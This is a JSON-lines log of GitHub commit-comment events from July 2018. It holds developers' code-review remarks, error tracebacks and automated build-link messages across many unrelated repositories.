{"id":"7923026341","type":"CommitCommentEvent","actor":{"login":"abdullahbayram"},"repo":{"name":"abdullahbayram/MyFirstApp"},"payload":{"comment":{"id":29606097,"position":5,"line":13,"path":"app/src/main/java/com/developer/myfirstapp/MainActivity.java","commit_id":"b0246ed7d814961b717b47c92358c18a82d0bd0b","created_at":"2018-07-05T12:53:43Z","updated_at":"2018-07-05T12:53:43Z","author_association":"OWNER","body":"Gelmedi"}},"created_at":"2018-07-05T12:53:43Z"}
{"id":"7923028920","type":"CommitCommentEvent","actor":{"login":"m-vo"},"repo":{"name":"contao/core-bundle"},"payload":{"comment":{"id":29606099,"position":7,"line":61,"path":"src/Resources/contao/classes/DropZone.php","commit_id":"a87b6466dca4ac4b7842e91dce6acf440fc7b411","created_at":"2018-07-05T12:54:13Z","updated_at":"2018-07-05T12:54:13Z","author_association":"NONE","body":"Ha! Didn't see that. :D"}},"created_at":"2018-07-05T12:54:13Z"}
{"id":"7923029910","type":"CommitCommentEvent","actor":{"login":"jangarrevoet"},"repo":{"name":"takluyver/h5py"},"payload":{"comment":{"id":29606103,"position":24,"line":24,"path":"examples/vds_simple.py","commit_id":"9b38539c1828af1c45ac736fccda907cded65c24","created_at":"2018-07-05T12:54:24Z","updated_at":"2018-07-05T12:54:24Z","author_association":"NONE","body":"If you not use the shape kwarg you get the following error:\r\nTypeError: 'NoneType' object is not iterable"}},"created_at":"2018-07-05T12:54:24Z"}
{"id":"7923033469","type":"CommitCommentEvent","actor":{"login":"diksha-nit"},"repo":{"name":"diksha-nit/exploradorewebd"},"payload":{"comment":{"id":29606115,"position":null,"line":null,"path":null,"commit_id":"fbca5e7d03b2d8c354e14e9154776c12355ff91c","created_at":"2018-07-05T12:55:05Z","updated_at":"2018-07-05T12:55:05Z","author_association":"OWNER","body":"https://warm-journey-67784.herokuapp.com"}},"created_at":"2018-07-05T12:55:05Z"}
{"id":"7923035531","type":"CommitCommentEvent","actor":{"login":"ochorocho"},"repo":{"name":"ochorocho/joro-typo3reversedeployment"},"payload":{"comment":{"id":29606123,"position":4,"line":6,"path":"composer.json","commit_id":"44890e6bad4403e3900ca478914c94831408d184","created_at":"2018-07-05T12:55:27Z","updated_at":"2018-07-05T12:55:27Z","author_association":"OWNER","body":"Thanks for that hint. Will pay more attention when reviewing stuff next time.\r\n"}},"created_at":"2018-07-05T12:55:27Z"}
{"id":"7923035769","type":"CommitCommentEvent","actor":{"login":"donggyushin"},"repo":{"name":"donggyushin/Security-Training"},"payload":{"comment":{"id":29606124,"position":null,"line":null,"path":null,"commit_id":"af75794f2a76a6e5b136aba0a477aaeb831680ee","created_at":"2018-07-05T12:55:29Z","updated_at":"2018-07-05T12:55:29Z","author_association":"OWNER","body":"드디어 일반페이지는 접속이 되고 /mypage 는 권한이 없어 접근되지 않습니다.\r\n먼저 설정된 값이 기억되고 두번째 이후 설정은 무시되는건가??\r\n\r\n스프링 문서를 보니 역시 그렇게 써있습니다.\r\n예를들어 허가를 .antMatchers(\"/**\") 이런식으로 내주면 /mypage 도 허가가 된것이고 그뒤에 .antMatchers(\"/mypage\").authenticated() 을 사용하더라도 두번째 속성은 무시됩니다.\r\n즉, 먼저 정해진 값은 불변됩니다.\r\n\r\n인증범위는 리소스 (css, js...) 를 제외하곤 가장 마지막에 인증을 풀어 주도록 설정하는 것이 좋을 것 같습니다."}},"created_at":"2018-07-05T12:55:29Z"}
{"id":"7923040199","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":29606140,"position":null,"line":null,"path":null,"commit_id":"33dc232d6ffcd985f52bf8b1a56b497033b6b52f","created_at":"2018-07-05T12:56:16Z","updated_at":"2018-07-05T12:56:16Z","author_association":"MEMBER","body":"This requires testing it doesn't affect with other scorm packages\r\n"}},"created_at":"2018-07-05T12:56:16Z"}
{"id":"7923042994","type":"CommitCommentEvent","actor":{"login":"takluyver"},"repo":{"name":"takluyver/h5py"},"payload":{"comment":{"id":29606144,"position":24,"line":24,"path":"examples/vds_simple.py","commit_id":"9b38539c1828af1c45ac736fccda907cded65c24","created_at":"2018-07-05T12:56:46Z","updated_at":"2018-07-05T12:56:46Z","author_association":"OWNER","body":"What's the traceback with that?"}},"created_at":"2018-07-05T12:56:46Z"}
{"id":"7923048776","type":"CommitCommentEvent","actor":{"login":"jangarrevoet"},"repo":{"name":"takluyver/h5py"},"payload":{"comment":{"id":29606154,"position":24,"line":24,"path":"examples/vds_simple.py","commit_id":"9b38539c1828af1c45ac736fccda907cded65c24","created_at":"2018-07-05T12:57:43Z","updated_at":"2018-07-05T12:57:43Z","author_association":"NONE","body":"Sorry forgot to paste that.\r\n---------------------------------------------------------------------------\r\nTypeError                                 Traceback (most recent call last)\r\n/tmp/vds_exp.py in <module>()\r\n     13 for n in range(1, 5):\r\n     14     filename = \"{}.h5\".format(n)\r\n---> 15     vsource = h5py.VirtualSource(filename, 'data')\r\n     16     layout[n - 1] = vsource\r\n     17 \r\n\r\n/home/p06user/PythonPath/lib/python/h5py-2.8.0.post0-py2.7-linux-x86_64.egg/h5py/_hl/vds.pyc in __init__(self, path_or_dataset, name, shape, dtype, maxshape)\r\n     72             self.maxshape = tuple([h5s.UNLIMITED if ix is None else ix\r\n     73                                    for ix in maxshape])\r\n---> 74         self.sel = SimpleSelection(shape)\r\n     75 \r\n     76     @property\r\n\r\n/home/p06user/PythonPath/lib/python/h5py-2.8.0.post0-py2.7-linux-x86_64.egg/h5py/_hl/selections.pyc in __init__(self, shape, *args, **kwds)\r\n    243 \r\n    244     def __init__(self, shape, *args, **kwds):\r\n--> 245         Selection.__init__(self, shape, *args, **kwds)\r\n    246         rank = len(self.shape)\r\n    247         self._sel = ((0,)*rank, self.shape, (1,)*rank, (False,)*rank)\r\n\r\n/home/p06user/PythonPath/lib/python/h5py-2.8.0.post0-py2.7-linux-x86_64.egg/h5py/_hl/selections.pyc in __init__(self, shape, spaceid)\r\n    151             self._shape = spaceid.shape\r\n    152         else:\r\n--> 153             shape = tuple(shape)\r\n    154             self._shape = shape\r\n    155             self._id = h5s.create_simple(shape, (h5s.UNLIMITED,)*len(shape))\r\n\r\nTypeError: 'NoneType' object is not iterable\r\n"}},"created_at":"2018-07-05T12:57:43Z"}
{"id":"7923050194","type":"CommitCommentEvent","actor":{"login":"steve-hayes"},"repo":{"name":"steve-hayes/Azure-TDSP-Utilities"},"payload":{"comment":{"id":29606158,"position":null,"line":null,"path":null,"commit_id":"8da368d37eb71d0c79692c82389b346c031d9e50","created_at":"2018-07-05T12:57:55Z","updated_at":"2018-07-05T12:57:55Z","author_association":"OWNER","body":"Merging from master"}},"created_at":"2018-07-05T12:57:55Z"}
{"id":"7923050405","type":"CommitCommentEvent","actor":{"login":"danieladayro"},"repo":{"name":"danieladayro/crudlaravel"},"payload":{"comment":{"id":29606159,"position":null,"line":null,"path":null,"commit_id":"19d8d8a0e24dd1bbc070caa5d4e72f5a77b6fddc","created_at":"2018-07-05T12:57:57Z","updated_at":"2018-07-05T12:57:57Z","author_association":"OWNER","body":"Path en Laravel => app/Http/Controllers"}},"created_at":"2018-07-05T12:57:57Z"}
{"id":"7923051216","type":"CommitCommentEvent","actor":{"login":"frgen"},"repo":{"name":"frgen/CursoIngresoJS"},"payload":{"comment":{"id":29606160,"position":null,"line":null,"path":null,"commit_id":"c32b0e7d77f9173849fc52e24f586841e138bc74","created_at":"2018-07-05T12:58:07Z","updated_at":"2018-07-05T12:58:07Z","author_association":"OWNER","body":"Ejercicios agregados del martes"}},"created_at":"2018-07-05T12:58:07Z"}
{"id":"7923054785","type":"CommitCommentEvent","actor":{"login":"frgen"},"repo":{"name":"frgen/CursoIngresoJS"},"payload":{"comment":{"id":29606167,"position":null,"line":null,"path":null,"commit_id":"9c5154c7b742e1806f9f73544bb561a794dc7da1","created_at":"2018-07-05T12:58:46Z","updated_at":"2018-07-05T12:58:46Z","author_association":"OWNER","body":"Ejercicios agregados del jueves"}},"created_at":"2018-07-05T12:58:46Z"}
{"id":"7923055809","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18022/programming-term2"},"payload":{"comment":{"id":29606171,"position":null,"line":null,"path":null,"commit_id":"dee570d906f8d1a82cf6c08d69e98b29d97eb758","created_at":"2018-07-05T12:58:57Z","updated_at":"2018-07-05T12:58:57Z","author_association":"NONE","body":"あと、他のファイルにもありましたが、pythonのソースコードには\r\n必ず拡張子.pyを付けてください。これも修正お願いします。\r\nまた、今回コミットしたソースコードは全てsrc/basic-c2ディレクトリに移動してください。\r\n\r\nヒント:\r\ngitで管理しているファイルの名称変更は\"git mv\"を使います。\r\nファイルの場所移動も同じく\"git mv\"です。\r\nOSのmvコマンドをgit mvに置き換えるイメージですね。"}},"created_at":"2018-07-05T12:58:57Z"}
{"id":"7923058555","type":"CommitCommentEvent","actor":{"login":"IfcOpenBot"},"repo":{"name":"IfcOpenBot/IfcOpenShell"},"payload":{"comment":{"id":29606175,"position":null,"line":null,"path":null,"commit_id":"6fdd2049a2a62e754009e2c5089a04804f1e9078","created_at":"2018-07-05T12:59:28Z","updated_at":"2018-07-05T12:59:28Z","author_association":"OWNER","body":"Hi,\n\nI've created the following builds for your commit:\n\n| |Linux|macOS|\n|---|---|---|\n|Blender py36|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-linux64.zip)|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-macos64.zip)|\n|IfcConvert|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-linux64.zip)|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-macos64.zip)|\n|IfcGeomServer|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-linux64.zip)|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-macos64.zip)|\n|Python 27|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-linux64.zip)|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-macos64.zip)|\n|Python 27u|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-linux64.zip)|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-macos64.zip)|\n|Python 32|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-linux64.zip)|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-macos64.zip)|\n|Python 32u|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-linux64.zip)|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-macos64.zip)|\n|Python 33|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-linux64.zip)|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-macos64.zip)|\n|Python 34|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-linux64.zip)|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-macos64.zip)|\n|Python 35|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-linux64.zip)|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-macos64.zip)|\n|Python 36|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-linux64.zip)|[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-macos64.zip)|\n\nKind regards,\nIfcOpenBot\n"}},"created_at":"2018-07-05T12:59:28Z"}
{"id":"7923060557","type":"CommitCommentEvent","actor":{"login":"MReis89"},"repo":{"name":"DenysXavier/WSBoletoSantander"},"payload":{"comment":{"id":29606179,"position":null,"line":null,"path":null,"commit_id":"fa778bce59cc348eea8354135181599fdbe81e05","created_at":"2018-07-05T12:59:50Z","updated_at":"2018-07-05T12:59:50Z","author_association":"NONE","body":"@DenysXavier, \r\n\r\nObrigado pela sugestão, vou experimentar essa versão.\r\n\r\nNão tinha conhecimento desse problema do number_format. Vou tentar evita-lo nesses casos.\r\n\r\n"}},"created_at":"2018-07-05T12:59:50Z"}
{"id":"7923060867","type":"CommitCommentEvent","actor":{"login":"earthlng"},"repo":{"name":"ghacksuserjs/ghacks-user.js"},"payload":{"comment":{"id":29606180,"position":null,"line":null,"path":null,"commit_id":"70abeda9d495edd72d5ca580233af17994e9ba49","created_at":"2018-07-05T12:59:53Z","updated_at":"2018-07-05T12:59:53Z","author_association":"MEMBER","body":"> Lets get the info right first though.\r\n\r\nI mean who cares. It's not an issue for any current versions anymore, the info is confusing and people who use PaleMoon, Waterfox, etc are self-proclaimed power users and I'm sure they can figure it out for themselves. Let's just remove those 2 lines"}},"created_at":"2018-07-05T12:59:53Z"}
{"id":"7923064436","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/stroyprombeton"},"payload":{"comment":{"id":29606191,"position":null,"line":null,"path":null,"commit_id":"323142adaa83c6b748556f419bc2c05f50c4ad5f","created_at":"2018-07-05T13:00:30Z","updated_at":"2018-07-05T13:00:30Z","author_association":"COLLABORATOR","body":"Puzzle `380-0244f860` discovered in   [`stroyprombeton/tests/tests_selenium.py`](  https://github.com/fidals/stroyprombeton/blob/master/stroyprombeton/tests/tests_selenium.py)   and submitted as #234. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-05T13:00:30Z"}
{"id":"7923064803","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/stroyprombeton"},"payload":{"comment":{"id":29606193,"position":null,"line":null,"path":null,"commit_id":"323142adaa83c6b748556f419bc2c05f50c4ad5f","created_at":"2018-07-05T13:00:33Z","updated_at":"2018-07-05T13:00:33Z","author_association":"COLLABORATOR","body":"I wasn't able to retrieve PDD puzzles from the code base and submit them to GitHub. If you think that it's a bug on our side, please submit it to [yegor256/0pdd](https://github.com/yegor256/0pdd/issues):\n\n> GET https://api.github.com/repos/fidals/stroyprombeton/issues/380: 404 - Not Found // See: https://developer.github.com/v3/issues/#get-a-single-issue\n\n\nPlease, copy and paste this stack trace to GitHub:\n\n\n```\nOctokit::NotFound\nGET https://api.github.com/repos/fidals/stroyprombeton/issues/380: 404 - Not Found // See: https://developer.github.com/v3/issues/#get-a-single-issue\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/response/raise_error.rb:16:in `on_complete'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/response.rb:9:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/response.rb:61:in `on_complete'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/response.rb:8:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/middleware/follow_redirects.rb:73:in `perform_with_redirection'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/middleware/follow_redirects.rb:61:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/rack_builder.rb:143:in `build_response'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/connection.rb:387:in `run_request'\n/app/vendor/bundle/ruby/2.3.0/gems/faraday-0.15.2/lib/faraday/connection.rb:138:in `get'\n/app/vendor/bundle/ruby/2.3.0/gems/sawyer-0.8.1/lib/sawyer/agent.rb:94:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/connection.rb:156:in `request'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/connection.rb:19:in `get'\n/app/vendor/bundle/ruby/2.3.0/gems/octokit-4.9.0/lib/octokit/client/issues.rb:114:in `issue'\n/app/objects/github_tickets.rb:39:in `notify'\n/app/objects/logged_tickets.rb:36:in `notify'\n/app/objects/github_tagged_tickets.rb:36:in `notify'\n/app/objects/commit_tickets.rb:34:in `notify'\n/app/objects/emailed_tickets.rb:31:in `notify'\n/app/objects/sentry_tickets.rb:36:in `notify'\n/app/objects/diff.rb:38:in `block in notify'\n/app/objects/diff.rb:33:in `each'\n/app/objects/diff.rb:33:in `notify'\n/app/objects/job.rb:40:in `proceed'\n/app/objects/job_starred.rb:33:in `proceed'\n/app/objects/job_recorded.rb:32:in `proceed'\n/app/objects/job_emailed.rb:35:in `proceed'\n/app/objects/job_commiterrors.rb:36:in `proceed'\n/app/objects/job_detached.rb:48:in `exclusive'\n/app/objects/job_detached.rb:36:in `block in proceed'\n/app/objects/job_detached.rb:36:in `fork'\n/app/objects/job_detached.rb:36:in `proceed'\n/app/0pdd.rb:342:in `block in <top (required)>'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1634:in `block in compile!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (3 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1011:in `route_eval'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:992:in `block (2 levels) in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1039:in `block in process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1037:in `process_route'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:990:in `block in route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `each'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:989:in `route!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1096:in `block in dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1093:in `dispatch!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `block in call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `block in invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `catch'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1075:in `invoke'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:924:in `call!'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:913:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/xss_header.rb:18:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/path_traversal.rb:16:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/json_csrf.rb:26:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/base.rb:50:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-protection-2.0.1/lib/rack/protection/frame_options.rb:31:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/logger.rb:15:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/common_logger.rb:33:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:231:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:224:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/head.rb:12:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/method_override.rb:22:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:194:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-05T13:00:33Z"}
{"id":"7923065872","type":"CommitCommentEvent","actor":{"login":"exodrifter"},"repo":{"name":"exodrifter/unity-python"},"payload":{"comment":{"id":29606194,"position":17,"line":17,"path":"Examples/Library.cs","commit_id":"1069d363b2c7b9569348db1c686eccaa74b2c144","created_at":"2018-07-05T13:00:44Z","updated_at":"2018-07-05T13:00:44Z","author_association":"OWNER","body":"Well, by default it's `unity-python/Lib` if you don't change what folder git clones to. It's a good point though that this should probably be whatever the default is. When I have some time I'll make that change.\r\n\r\nAs an aside, this is pretty fragile and I plan on making a new update that will move the `Lib` folder to the `StreamingAssets` path. The only reason I haven't already is because I'm wary of potential security problems."}},"created_at":"2018-07-05T13:00:44Z"}
{"id":"7923066805","type":"CommitCommentEvent","actor":{"login":"IfcOpenBot"},"repo":{"name":"IfcOpenBot/IfcOpenShell"},"payload":{"comment":{"id":29606195,"position":null,"line":null,"path":null,"commit_id":"6fdd2049a2a62e754009e2c5089a04804f1e9078","created_at":"2018-07-05T13:00:53Z","updated_at":"2018-07-05T13:00:53Z","author_association":"OWNER","body":"Hi,\n\nI've created the following builds for your commit:\n\n| |Linux|macOS|\n|---|---|---|\n|Blender py36| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-linux32.zip)[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-macos64.zip)|\n|IfcConvert| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-linux32.zip)[64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-macos64.zip)|\n|IfcGeomServer| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-linux32.zip)[64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-macos64.zip)|\n|Python 27| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-linux32.zip)[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-macos64.zip)|\n|Python 27u| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-linux32.zip)[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-macos64.zip)|\n|Python 32| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-linux32.zip)[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-macos64.zip)|\n|Python 32u| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-linux32.zip)[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-macos64.zip)|\n|Python 33| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-linux32.zip)[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-macos64.zip)|\n|Python 34| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-linux32.zip)[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-macos64.zip)|\n|Python 35| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-linux32.zip)[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-macos64.zip)|\n|Python 36| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-linux32.zip)[64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-macos64.zip)|\n\nKind regards,\nIfcOpenBot\n"}},"created_at":"2018-07-05T13:00:53Z"}
{"id":"7923067130","type":"CommitCommentEvent","actor":{"login":"Pastafarianist"},"repo":{"name":"serokell/ariadne"},"payload":{"comment":{"id":29606196,"position":43,"line":44,"path":"ariadne/src/Ariadne/Wallet/Face.hs","commit_id":"2874d25e31dadbbebcb65b23732397783aa05a18","created_at":"2018-07-05T13:00:56Z","updated_at":"2018-07-05T13:00:56Z","author_association":"MEMBER","body":"I think the :proper: solution is a `newtype`. `Word` is confusing because it provides no guarantees on its size, it's like `int` in C. `Word32` is more explicit and thus better."}},"created_at":"2018-07-05T13:00:56Z"}
{"id":"7923068811","type":"CommitCommentEvent","actor":{"login":"PascalPrecht"},"repo":{"name":"ipfs/js-ipfs"},"payload":{"comment":{"id":29606198,"position":7,"line":50,"path":"package.json","commit_id":"c1ee2474b08928ad64dac9148b7852f6c272387e","created_at":"2018-07-05T13:01:14Z","updated_at":"2018-07-05T13:01:14Z","author_association":"CONTRIBUTOR","body":"Any reasoning why this has been removed? Inconvenience (because --no-verify) ?"}},"created_at":"2018-07-05T13:01:14Z"}
{"id":"7923069317","type":"CommitCommentEvent","actor":{"login":"donggyushin"},"repo":{"name":"donggyushin/Security-Training"},"payload":{"comment":{"id":29606200,"position":null,"line":null,"path":null,"commit_id":"0827608cd70311cd343625de5f0d3cbe021f9081","created_at":"2018-07-05T13:01:19Z","updated_at":"2018-07-05T13:01:19Z","author_association":"OWNER","body":"인증범위는 리소스 (css, js...) 를 제외하곤 가장 마지막에 인증을 풀어 주도록 설정하는 것이 좋을 것 같습니다."}},"created_at":"2018-07-05T13:01:19Z"}
{"id":"7923071511","type":"CommitCommentEvent","actor":{"login":"zlumer"},"repo":{"name":"DucaturFw/neo-dissassembler-front"},"payload":{"comment":{"id":29606206,"position":28,"line":14,"path":"client/reducers/explorer-reducer.js","commit_id":"dc7083ab81bb48450a7bb81c2338c4c0b8c95bf5","created_at":"2018-07-05T13:01:41Z","updated_at":"2018-07-05T13:01:41Z","author_association":"MEMBER","body":"Put every property on a separate line"}},"created_at":"2018-07-05T13:01:41Z"}
